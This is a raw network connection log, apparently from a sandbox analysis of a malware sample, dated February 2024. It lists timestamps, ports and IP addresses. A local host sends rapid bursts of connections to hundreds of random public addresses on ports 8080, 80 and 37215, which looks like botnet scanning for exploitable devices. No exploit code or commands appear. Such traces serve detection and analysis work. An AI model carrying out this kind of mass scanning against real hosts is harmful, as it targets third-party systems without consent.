Feb 25, 2024 19:02:18.568892956 CET	6758	8080	192.168.2.15	31.218.191.196
Feb 25, 2024 19:02:18.568892956 CET	6758	8080	192.168.2.15	31.114.184.194
Feb 25, 2024 19:02:18.568892956 CET	6758	8080	192.168.2.15	31.152.204.172
Feb 25, 2024 19:02:18.568901062 CET	6758	8080	192.168.2.15	95.240.173.109
Feb 25, 2024 19:02:18.568901062 CET	6758	8080	192.168.2.15	31.214.100.81
Feb 25, 2024 19:02:18.568901062 CET	6758	8080	192.168.2.15	94.94.139.210
Feb 25, 2024 19:02:18.568901062 CET	6758	8080	192.168.2.15	95.178.56.32
Feb 25, 2024 19:02:18.568902016 CET	6758	8080	192.168.2.15	31.176.247.36
Feb 25, 2024 19:02:18.568902016 CET	6758	8080	192.168.2.15	85.222.207.27
Feb 25, 2024 19:02:18.568903923 CET	6758	8080	192.168.2.15	62.244.63.43
Feb 25, 2024 19:02:18.568903923 CET	6758	8080	192.168.2.15	31.210.242.135
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	85.185.158.132
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	62.188.187.163
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	95.178.56.219
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	62.5.78.125
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	31.2.244.119
Feb 25, 2024 19:02:18.568905115 CET	6758	8080	192.168.2.15	95.49.152.17
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	95.156.214.139
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	94.143.97.76
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	95.145.182.107
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	94.106.6.162
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	62.132.167.117
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	62.252.252.33
Feb 25, 2024 19:02:18.568922997 CET	6758	8080	192.168.2.15	94.255.77.79
Feb 25, 2024 19:02:18.568944931 CET	6758	8080	192.168.2.15	94.29.209.145
Feb 25, 2024 19:02:18.568944931 CET	6758	8080	192.168.2.15	85.63.132.68
Feb 25, 2024 19:02:18.568944931 CET	6758	8080	192.168.2.15	95.192.114.78
Feb 25, 2024 19:02:18.568949938 CET	6758	8080	192.168.2.15	95.46.207.8
Feb 25, 2024 19:02:18.568958044 CET	6758	8080	192.168.2.15	94.28.195.14
Feb 25, 2024 19:02:18.568958044 CET	6758	8080	192.168.2.15	62.28.46.77
Feb 25, 2024 19:02:18.568967104 CET	6758	8080	192.168.2.15	85.184.235.240
Feb 25, 2024 19:02:18.568974018 CET	6758	8080	192.168.2.15	31.236.141.46
Feb 25, 2024 19:02:18.568974018 CET	6758	8080	192.168.2.15	85.136.75.194
Feb 25, 2024 19:02:18.568977118 CET	6758	8080	192.168.2.15	95.62.75.150
Feb 25, 2024 19:02:18.568977118 CET	6758	8080	192.168.2.15	31.189.32.43
Feb 25, 2024 19:02:18.568984985 CET	6758	8080	192.168.2.15	62.236.192.135
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	94.139.230.60
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	95.85.220.25
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	94.76.176.81
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	85.154.168.218
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	31.67.19.137
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	62.220.43.101
Feb 25, 2024 19:02:18.568986893 CET	6758	8080	192.168.2.15	95.247.241.163
Feb 25, 2024 19:02:18.568991899 CET	6758	8080	192.168.2.15	94.164.176.160
Feb 25, 2024 19:02:18.568988085 CET	6758	8080	192.168.2.15	62.89.240.123
Feb 25, 2024 19:02:18.568988085 CET	6758	8080	192.168.2.15	94.13.84.7
Feb 25, 2024 19:02:18.568994999 CET	6758	8080	192.168.2.15	85.29.213.174
Feb 25, 2024 19:02:18.568994999 CET	6758	8080	192.168.2.15	94.68.107.89
Feb 25, 2024 19:02:18.569008112 CET	6758	8080	192.168.2.15	85.44.119.32
Feb 25, 2024 19:02:18.569014072 CET	6758	8080	192.168.2.15	31.225.105.188
Feb 25, 2024 19:02:18.569027901 CET	6758	8080	192.168.2.15	94.150.33.172
Feb 25, 2024 19:02:18.569029093 CET	6758	8080	192.168.2.15	62.98.157.52
Feb 25, 2024 19:02:18.569036007 CET	6758	8080	192.168.2.15	62.38.146.191
Feb 25, 2024 19:02:18.569036007 CET	6758	8080	192.168.2.15	95.213.154.192
Feb 25, 2024 19:02:18.569036007 CET	6758	8080	192.168.2.15	94.78.230.182
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	94.206.243.78
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	94.205.145.92
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	62.161.167.209
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	31.116.9.51
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	62.117.150.181
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	31.174.134.247
Feb 25, 2024 19:02:18.569042921 CET	6758	8080	192.168.2.15	85.51.184.121
Feb 25, 2024 19:02:18.569050074 CET	6758	8080	192.168.2.15	31.114.75.112
Feb 25, 2024 19:02:18.569050074 CET	6758	8080	192.168.2.15	31.146.65.18
Feb 25, 2024 19:02:18.569050074 CET	6758	8080	192.168.2.15	31.32.91.209
Feb 25, 2024 19:02:18.569050074 CET	6758	8080	192.168.2.15	95.52.44.82
Feb 25, 2024 19:02:18.569051027 CET	6758	8080	192.168.2.15	94.38.66.237
Feb 25, 2024 19:02:18.569061995 CET	8080	44750	94.123.6.73	192.168.2.15
Feb 25, 2024 19:02:18.569068909 CET	6758	8080	192.168.2.15	94.49.107.223
Feb 25, 2024 19:02:18.569075108 CET	6758	8080	192.168.2.15	62.24.61.186
Feb 25, 2024 19:02:18.569075108 CET	6758	8080	192.168.2.15	85.114.161.80
Feb 25, 2024 19:02:18.569088936 CET	6758	8080	192.168.2.15	31.86.228.113
Feb 25, 2024 19:02:18.569088936 CET	6758	8080	192.168.2.15	94.56.182.29
Feb 25, 2024 19:02:18.569091082 CET	6758	8080	192.168.2.15	85.245.212.202
Feb 25, 2024 19:02:18.569093943 CET	6758	8080	192.168.2.15	31.199.52.181
Feb 25, 2024 19:02:18.569101095 CET	6758	8080	192.168.2.15	94.140.24.93
Feb 25, 2024 19:02:18.569103003 CET	6758	8080	192.168.2.15	94.134.124.183
Feb 25, 2024 19:02:18.569103003 CET	6758	8080	192.168.2.15	95.145.208.135
Feb 25, 2024 19:02:18.569104910 CET	6758	8080	192.168.2.15	31.123.101.13
Feb 25, 2024 19:02:18.569109917 CET	6758	8080	192.168.2.15	95.73.218.145
Feb 25, 2024 19:02:18.569128036 CET	6758	8080	192.168.2.15	95.94.100.178
Feb 25, 2024 19:02:18.569130898 CET	6758	8080	192.168.2.15	31.45.30.86
Feb 25, 2024 19:02:18.569133043 CET	6758	8080	192.168.2.15	85.122.191.191
Feb 25, 2024 19:02:18.569133997 CET	6758	8080	192.168.2.15	31.129.16.89
Feb 25, 2024 19:02:18.569144964 CET	6758	8080	192.168.2.15	62.161.55.66
Feb 25, 2024 19:02:18.569148064 CET	6758	8080	192.168.2.15	95.245.27.201
Feb 25, 2024 19:02:18.569166899 CET	6758	8080	192.168.2.15	94.107.170.5
Feb 25, 2024 19:02:18.569166899 CET	6758	8080	192.168.2.15	31.105.62.252
Feb 25, 2024 19:02:18.569166899 CET	6758	8080	192.168.2.15	62.74.27.170
Feb 25, 2024 19:02:18.571517944 CET	8080	32822	94.121.100.30	192.168.2.15
Feb 25, 2024 19:02:18.664869070 CET	8080	6758	85.237.93.75	192.168.2.15
Feb 25, 2024 19:02:18.692677021 CET	8080	6758	62.72.166.45	192.168.2.15
Feb 25, 2024 19:02:18.692962885 CET	6758	8080	192.168.2.15	62.72.166.45
Feb 25, 2024 19:02:18.748100996 CET	8080	6758	85.208.136.64	192.168.2.15
Feb 25, 2024 19:02:18.748389006 CET	8080	6758	62.113.252.37	192.168.2.15
Feb 25, 2024 19:02:18.763226986 CET	8080	6758	62.28.204.101	192.168.2.15
Feb 25, 2024 19:02:18.769510031 CET	8080	6758	62.225.93.251	192.168.2.15
Feb 25, 2024 19:02:18.769711018 CET	8080	6758	95.232.147.182	192.168.2.15
Feb 25, 2024 19:02:18.770457983 CET	8080	6758	62.211.54.2	192.168.2.15
Feb 25, 2024 19:02:18.786371946 CET	8080	32826	94.121.100.30	192.168.2.15
Feb 25, 2024 19:02:18.791122913 CET	8080	6758	94.121.142.20	192.168.2.15
Feb 25, 2024 19:02:18.791225910 CET	6758	8080	192.168.2.15	94.121.142.20
Feb 25, 2024 19:02:18.799505949 CET	8080	6758	62.29.86.189	192.168.2.15
Feb 25, 2024 19:02:18.799577951 CET	6758	8080	192.168.2.15	62.29.86.189
Feb 25, 2024 19:02:18.816833973 CET	8080	6758	31.146.65.18	192.168.2.15
Feb 25, 2024 19:02:18.828026056 CET	8080	6758	95.38.155.9	192.168.2.15
Feb 25, 2024 19:02:18.860313892 CET	6502	80	192.168.2.15	95.39.102.216
Feb 25, 2024 19:02:18.860315084 CET	6502	80	192.168.2.15	95.28.40.225
Feb 25, 2024 19:02:18.860317945 CET	6502	80	192.168.2.15	95.222.73.199
Feb 25, 2024 19:02:18.860321999 CET	6502	80	192.168.2.15	95.72.24.180
Feb 25, 2024 19:02:18.860321999 CET	6502	80	192.168.2.15	95.50.15.118
Feb 25, 2024 19:02:18.860321999 CET	6502	80	192.168.2.15	95.212.14.224
Feb 25, 2024 19:02:18.860321999 CET	6502	80	192.168.2.15	95.1.35.28
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.78.223.187
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.194.24.70
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.120.68.15
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.77.132.221
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.133.170.199
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.7.187.8
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.138.63.137
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.173.227.42
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.112.71.136
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.172.65.107
Feb 25, 2024 19:02:18.860383034 CET	6502	80	192.168.2.15	95.153.242.170
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.53.24.135
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.28.147.126
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.174.78.241
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.71.20.155
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.167.156.135
Feb 25, 2024 19:02:18.860383034 CET	6502	80	192.168.2.15	95.111.180.3
Feb 25, 2024 19:02:18.860374928 CET	6502	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.235.138.145
Feb 25, 2024 19:02:18.860383034 CET	6502	80	192.168.2.15	95.182.220.205
Feb 25, 2024 19:02:18.860377073 CET	6502	80	192.168.2.15	95.138.65.128
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.212.232.148
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.200.240.145
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.168.60.231
Feb 25, 2024 19:02:18.860382080 CET	6502	80	192.168.2.15	95.165.164.36
Feb 25, 2024 19:02:18.860421896 CET	6502	80	192.168.2.15	95.141.198.171
Feb 25, 2024 19:02:18.860421896 CET	6502	80	192.168.2.15	95.110.167.254
Feb 25, 2024 19:02:18.860425949 CET	6502	80	192.168.2.15	95.96.179.15
Feb 25, 2024 19:02:18.860431910 CET	6502	80	192.168.2.15	95.105.174.154
Feb 25, 2024 19:02:18.860431910 CET	6502	80	192.168.2.15	95.174.130.47
Feb 25, 2024 19:02:18.860431910 CET	6502	80	192.168.2.15	95.55.87.15
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.122.243.82
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.35.46.116
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.70.109.118
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.75.230.32
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:18.860445976 CET	6502	80	192.168.2.15	95.244.47.52
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.94.217.115
Feb 25, 2024 19:02:18.860445976 CET	6502	80	192.168.2.15	95.121.210.92
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.172.104.108
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.246.159.235
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.82.19.89
Feb 25, 2024 19:02:18.860440016 CET	6502	80	192.168.2.15	95.26.22.204
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.248.216.9
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.32.105.227
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.200.236.81
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.67.19.241
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.61.75.110
Feb 25, 2024 19:02:18.860440969 CET	6502	80	192.168.2.15	95.58.197.167
Feb 25, 2024 19:02:18.860460043 CET	6502	80	192.168.2.15	95.140.50.166
Feb 25, 2024 19:02:18.860461950 CET	6502	80	192.168.2.15	95.38.69.195
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.222.30.39
Feb 25, 2024 19:02:18.860461950 CET	6502	80	192.168.2.15	95.89.190.30
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.71.148.242
Feb 25, 2024 19:02:18.860461950 CET	6502	80	192.168.2.15	95.92.23.252
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.119.59.216
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.118.168.172
Feb 25, 2024 19:02:18.860465050 CET	6502	80	192.168.2.15	95.179.54.119
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.88.69.59
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:18.860462904 CET	6502	80	192.168.2.15	95.112.105.226
Feb 25, 2024 19:02:18.860476017 CET	6502	80	192.168.2.15	95.141.190.25
Feb 25, 2024 19:02:18.860493898 CET	6502	80	192.168.2.15	95.171.43.130
Feb 25, 2024 19:02:18.860498905 CET	6502	80	192.168.2.15	95.116.76.213
Feb 25, 2024 19:02:18.860501051 CET	6502	80	192.168.2.15	95.158.108.118
Feb 25, 2024 19:02:18.860503912 CET	6502	80	192.168.2.15	95.212.59.18
Feb 25, 2024 19:02:18.860515118 CET	6502	80	192.168.2.15	95.222.137.68
Feb 25, 2024 19:02:18.860524893 CET	6502	80	192.168.2.15	95.248.151.240
Feb 25, 2024 19:02:18.860524893 CET	6502	80	192.168.2.15	95.146.23.110
Feb 25, 2024 19:02:18.860531092 CET	6502	80	192.168.2.15	95.23.204.220
Feb 25, 2024 19:02:18.860531092 CET	6502	80	192.168.2.15	95.5.15.158
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.185.49.173
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.168.50.161
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.41.59.99
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.3.182.215
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.45.139.223
Feb 25, 2024 19:02:18.860532045 CET	6502	80	192.168.2.15	95.136.166.240
Feb 25, 2024 19:02:18.860534906 CET	6502	80	192.168.2.15	95.47.137.159
Feb 25, 2024 19:02:18.860536098 CET	6502	80	192.168.2.15	95.233.254.133
Feb 25, 2024 19:02:18.860539913 CET	6502	80	192.168.2.15	95.235.68.158
Feb 25, 2024 19:02:18.860554934 CET	6502	80	192.168.2.15	95.210.203.122
Feb 25, 2024 19:02:18.860554934 CET	6502	80	192.168.2.15	95.70.210.72
Feb 25, 2024 19:02:18.860559940 CET	6502	80	192.168.2.15	95.202.154.34
Feb 25, 2024 19:02:18.860569954 CET	6502	80	192.168.2.15	95.27.104.190
Feb 25, 2024 19:02:18.860574007 CET	6502	80	192.168.2.15	95.203.213.165
Feb 25, 2024 19:02:18.860583067 CET	6502	80	192.168.2.15	95.119.152.253
Feb 25, 2024 19:02:18.860583067 CET	6502	80	192.168.2.15	95.75.119.92
Feb 25, 2024 19:02:18.860583067 CET	6502	80	192.168.2.15	95.114.164.161
Feb 25, 2024 19:02:18.860598087 CET	6502	80	192.168.2.15	95.236.114.245
Feb 25, 2024 19:02:18.860599995 CET	6502	80	192.168.2.15	95.65.1.57
Feb 25, 2024 19:02:18.860605955 CET	6502	80	192.168.2.15	95.24.239.56
Feb 25, 2024 19:02:18.860609055 CET	6502	80	192.168.2.15	95.96.241.158
Feb 25, 2024 19:02:18.860608101 CET	6502	80	192.168.2.15	95.254.167.13
Feb 25, 2024 19:02:18.860608101 CET	6502	80	192.168.2.15	95.34.150.246
Feb 25, 2024 19:02:18.860609055 CET	6502	80	192.168.2.15	95.15.190.158
Feb 25, 2024 19:02:18.860609055 CET	6502	80	192.168.2.15	95.251.165.82
Feb 25, 2024 19:02:18.860609055 CET	6502	80	192.168.2.15	95.69.182.83
Feb 25, 2024 19:02:18.860630035 CET	6502	80	192.168.2.15	95.166.88.201
Feb 25, 2024 19:02:18.860630035 CET	6502	80	192.168.2.15	95.212.39.229
Feb 25, 2024 19:02:18.860639095 CET	6502	80	192.168.2.15	95.231.3.137
Feb 25, 2024 19:02:18.860642910 CET	6502	80	192.168.2.15	95.25.95.52
Feb 25, 2024 19:02:18.860645056 CET	6502	80	192.168.2.15	95.52.161.62
Feb 25, 2024 19:02:18.860658884 CET	6502	80	192.168.2.15	95.245.117.27
Feb 25, 2024 19:02:18.860658884 CET	6502	80	192.168.2.15	95.235.239.255
Feb 25, 2024 19:02:18.860671997 CET	6502	80	192.168.2.15	95.68.18.89
Feb 25, 2024 19:02:18.860672951 CET	6502	80	192.168.2.15	95.65.131.217
Feb 25, 2024 19:02:18.860680103 CET	6502	80	192.168.2.15	95.135.209.60
Feb 25, 2024 19:02:18.860681057 CET	6502	80	192.168.2.15	95.83.44.146
Feb 25, 2024 19:02:18.860681057 CET	6502	80	192.168.2.15	95.79.95.156
Feb 25, 2024 19:02:18.860693932 CET	6502	80	192.168.2.15	95.145.48.112
Feb 25, 2024 19:02:18.860693932 CET	6502	80	192.168.2.15	95.85.14.198
Feb 25, 2024 19:02:18.860706091 CET	6502	80	192.168.2.15	95.35.136.127
Feb 25, 2024 19:02:18.860708952 CET	6502	80	192.168.2.15	95.65.51.75
Feb 25, 2024 19:02:18.860719919 CET	6502	80	192.168.2.15	95.190.249.225
Feb 25, 2024 19:02:18.860728979 CET	6502	80	192.168.2.15	95.118.180.140
Feb 25, 2024 19:02:18.860738039 CET	6502	80	192.168.2.15	95.165.68.82
Feb 25, 2024 19:02:18.860738039 CET	6502	80	192.168.2.15	95.17.27.61
Feb 25, 2024 19:02:18.860754013 CET	6502	80	192.168.2.15	95.7.57.135
Feb 25, 2024 19:02:18.860759974 CET	6502	80	192.168.2.15	95.245.12.33
Feb 25, 2024 19:02:18.860759974 CET	6502	80	192.168.2.15	95.65.145.172
Feb 25, 2024 19:02:18.860779047 CET	6502	80	192.168.2.15	95.56.31.24
Feb 25, 2024 19:02:18.860783100 CET	6502	80	192.168.2.15	95.226.120.84
Feb 25, 2024 19:02:18.860785007 CET	6502	80	192.168.2.15	95.160.56.215
Feb 25, 2024 19:02:18.860789061 CET	6502	80	192.168.2.15	95.13.79.228
Feb 25, 2024 19:02:18.860795021 CET	6502	80	192.168.2.15	95.224.80.129
Feb 25, 2024 19:02:18.860801935 CET	6502	80	192.168.2.15	95.153.245.220
Feb 25, 2024 19:02:18.860801935 CET	6502	80	192.168.2.15	95.39.110.212
Feb 25, 2024 19:02:18.860817909 CET	6502	80	192.168.2.15	95.12.75.17
Feb 25, 2024 19:02:18.860821962 CET	6502	80	192.168.2.15	95.33.74.199
Feb 25, 2024 19:02:18.860831976 CET	6502	80	192.168.2.15	95.58.88.199
Feb 25, 2024 19:02:18.860836983 CET	6502	80	192.168.2.15	95.166.183.17
Feb 25, 2024 19:02:18.860848904 CET	6502	80	192.168.2.15	95.147.22.205
Feb 25, 2024 19:02:18.860852957 CET	6502	80	192.168.2.15	95.129.15.113
Feb 25, 2024 19:02:18.860857010 CET	6502	80	192.168.2.15	95.233.95.237
Feb 25, 2024 19:02:18.860867977 CET	6502	80	192.168.2.15	95.232.165.200
Feb 25, 2024 19:02:18.860874891 CET	6502	80	192.168.2.15	95.215.111.176
Feb 25, 2024 19:02:18.860881090 CET	6502	80	192.168.2.15	95.206.203.39
Feb 25, 2024 19:02:18.860892057 CET	6502	80	192.168.2.15	95.114.247.129
Feb 25, 2024 19:02:18.860897064 CET	6502	80	192.168.2.15	95.166.36.48
Feb 25, 2024 19:02:18.860898018 CET	6502	80	192.168.2.15	95.93.3.83
Feb 25, 2024 19:02:18.860912085 CET	6502	80	192.168.2.15	95.11.230.191
Feb 25, 2024 19:02:18.860914946 CET	6502	80	192.168.2.15	95.176.110.240
Feb 25, 2024 19:02:18.860927105 CET	6502	80	192.168.2.15	95.51.72.77
Feb 25, 2024 19:02:18.860927105 CET	6502	80	192.168.2.15	95.240.136.243
Feb 25, 2024 19:02:18.860934019 CET	6502	80	192.168.2.15	95.5.154.13
Feb 25, 2024 19:02:18.860935926 CET	6502	80	192.168.2.15	95.177.61.18
Feb 25, 2024 19:02:18.860956907 CET	6502	80	192.168.2.15	95.131.185.90
Feb 25, 2024 19:02:18.860958099 CET	6502	80	192.168.2.15	95.56.242.81
Feb 25, 2024 19:02:18.860959053 CET	6502	80	192.168.2.15	95.126.13.213
Feb 25, 2024 19:02:18.860965014 CET	6502	80	192.168.2.15	95.83.156.57
Feb 25, 2024 19:02:18.860974073 CET	6502	80	192.168.2.15	95.224.186.65
Feb 25, 2024 19:02:18.860974073 CET	6502	80	192.168.2.15	95.247.89.108
Feb 25, 2024 19:02:18.860997915 CET	6502	80	192.168.2.15	95.227.156.239
Feb 25, 2024 19:02:18.869141102 CET	6246	37215	192.168.2.15	197.145.21.64
Feb 25, 2024 19:02:18.869168997 CET	6246	37215	192.168.2.15	197.41.123.77
Feb 25, 2024 19:02:18.869169950 CET	6246	37215	192.168.2.15	197.47.190.220
Feb 25, 2024 19:02:18.869179964 CET	6246	37215	192.168.2.15	197.137.123.70
Feb 25, 2024 19:02:18.869185925 CET	6246	37215	192.168.2.15	197.0.174.155
Feb 25, 2024 19:02:18.869194984 CET	6246	37215	192.168.2.15	197.72.175.161
Feb 25, 2024 19:02:18.869199038 CET	6246	37215	192.168.2.15	197.153.200.151
Feb 25, 2024 19:02:18.869218111 CET	6246	37215	192.168.2.15	197.65.161.74
Feb 25, 2024 19:02:18.869218111 CET	6246	37215	192.168.2.15	197.142.21.177
Feb 25, 2024 19:02:18.869239092 CET	6246	37215	192.168.2.15	197.90.116.230
Feb 25, 2024 19:02:18.869242907 CET	6246	37215	192.168.2.15	197.147.198.138
Feb 25, 2024 19:02:18.869270086 CET	6246	37215	192.168.2.15	197.77.173.103
Feb 25, 2024 19:02:18.869277954 CET	6246	37215	192.168.2.15	197.83.164.58
Feb 25, 2024 19:02:18.869290113 CET	6246	37215	192.168.2.15	197.15.9.155
Feb 25, 2024 19:02:18.869307041 CET	6246	37215	192.168.2.15	197.99.148.79
Feb 25, 2024 19:02:18.869308949 CET	6246	37215	192.168.2.15	197.104.129.48
Feb 25, 2024 19:02:18.869322062 CET	6246	37215	192.168.2.15	197.173.66.196
Feb 25, 2024 19:02:18.869334936 CET	6246	37215	192.168.2.15	197.166.248.1
Feb 25, 2024 19:02:18.869355917 CET	6246	37215	192.168.2.15	197.204.16.225
Feb 25, 2024 19:02:18.869359970 CET	6246	37215	192.168.2.15	197.133.70.179
Feb 25, 2024 19:02:18.869371891 CET	6246	37215	192.168.2.15	197.255.71.221
Feb 25, 2024 19:02:18.869385958 CET	6246	37215	192.168.2.15	197.64.80.206
Feb 25, 2024 19:02:18.869405031 CET	6246	37215	192.168.2.15	197.189.34.60
Feb 25, 2024 19:02:18.869417906 CET	6246	37215	192.168.2.15	197.221.36.147
Feb 25, 2024 19:02:18.869429111 CET	6246	37215	192.168.2.15	197.208.164.57
Feb 25, 2024 19:02:18.869446039 CET	6246	37215	192.168.2.15	197.122.242.29
Feb 25, 2024 19:02:18.869446993 CET	6246	37215	192.168.2.15	197.226.4.156
Feb 25, 2024 19:02:18.869446993 CET	6246	37215	192.168.2.15	197.80.109.36
Feb 25, 2024 19:02:18.869446993 CET	6246	37215	192.168.2.15	197.71.130.116
Feb 25, 2024 19:02:18.869446993 CET	6246	37215	192.168.2.15	197.43.102.17
Feb 25, 2024 19:02:18.869460106 CET	6246	37215	192.168.2.15	197.12.204.250
Feb 25, 2024 19:02:18.869486094 CET	6246	37215	192.168.2.15	197.82.228.83
Feb 25, 2024 19:02:18.869513035 CET	6246	37215	192.168.2.15	197.252.25.161
Feb 25, 2024 19:02:18.869528055 CET	6246	37215	192.168.2.15	197.192.141.246
Feb 25, 2024 19:02:18.869535923 CET	6246	37215	192.168.2.15	197.60.152.165
Feb 25, 2024 19:02:18.869539022 CET	6246	37215	192.168.2.15	197.16.233.119
Feb 25, 2024 19:02:18.869559050 CET	6246	37215	192.168.2.15	197.145.140.177
Feb 25, 2024 19:02:18.869559050 CET	6246	37215	192.168.2.15	197.173.106.130
Feb 25, 2024 19:02:18.869576931 CET	6246	37215	192.168.2.15	197.104.132.13
Feb 25, 2024 19:02:18.869576931 CET	6246	37215	192.168.2.15	197.165.43.178
Feb 25, 2024 19:02:18.869596004 CET	6246	37215	192.168.2.15	197.68.23.247
Feb 25, 2024 19:02:18.869596004 CET	6246	37215	192.168.2.15	197.175.96.138
Feb 25, 2024 19:02:18.869600058 CET	6246	37215	192.168.2.15	197.4.174.170
Feb 25, 2024 19:02:18.869601011 CET	6246	37215	192.168.2.15	197.198.86.67
Feb 25, 2024 19:02:18.869601011 CET	6246	37215	192.168.2.15	197.124.55.253
Feb 25, 2024 19:02:18.869610071 CET	6246	37215	192.168.2.15	197.237.139.234
Feb 25, 2024 19:02:18.869621992 CET	6246	37215	192.168.2.15	197.113.125.74
Feb 25, 2024 19:02:18.869627953 CET	6246	37215	192.168.2.15	197.137.164.217
Feb 25, 2024 19:02:18.869638920 CET	6246	37215	192.168.2.15	197.83.57.243
Feb 25, 2024 19:02:18.869657993 CET	6246	37215	192.168.2.15	197.141.177.225
Feb 25, 2024 19:02:18.869668961 CET	6246	37215	192.168.2.15	197.231.81.194
Feb 25, 2024 19:02:18.869682074 CET	6246	37215	192.168.2.15	197.193.175.24
Feb 25, 2024 19:02:18.869695902 CET	6246	37215	192.168.2.15	197.217.59.174
Feb 25, 2024 19:02:18.869698048 CET	6246	37215	192.168.2.15	197.147.25.213
Feb 25, 2024 19:02:18.869719982 CET	6246	37215	192.168.2.15	197.183.119.34
Feb 25, 2024 19:02:18.869734049 CET	6246	37215	192.168.2.15	197.213.39.157
Feb 25, 2024 19:02:18.869734049 CET	6246	37215	192.168.2.15	197.150.201.93
Feb 25, 2024 19:02:18.869738102 CET	6246	37215	192.168.2.15	197.115.86.153
Feb 25, 2024 19:02:18.869750023 CET	6246	37215	192.168.2.15	197.86.29.144
Feb 25, 2024 19:02:18.869761944 CET	6246	37215	192.168.2.15	197.172.215.217
Feb 25, 2024 19:02:18.869775057 CET	6246	37215	192.168.2.15	197.167.31.9
Feb 25, 2024 19:02:18.869781017 CET	6246	37215	192.168.2.15	197.67.44.24
Feb 25, 2024 19:02:18.869791031 CET	6246	37215	192.168.2.15	197.162.87.201
Feb 25, 2024 19:02:18.869791031 CET	6246	37215	192.168.2.15	197.95.89.38
Feb 25, 2024 19:02:18.869813919 CET	6246	37215	192.168.2.15	197.16.179.155
Feb 25, 2024 19:02:18.869827032 CET	6246	37215	192.168.2.15	197.85.247.153
Feb 25, 2024 19:02:18.869831085 CET	6246	37215	192.168.2.15	197.170.189.48
Feb 25, 2024 19:02:18.869832039 CET	6246	37215	192.168.2.15	197.13.81.232
Feb 25, 2024 19:02:18.869848013 CET	6246	37215	192.168.2.15	197.205.161.124
Feb 25, 2024 19:02:18.869854927 CET	6246	37215	192.168.2.15	197.1.73.150
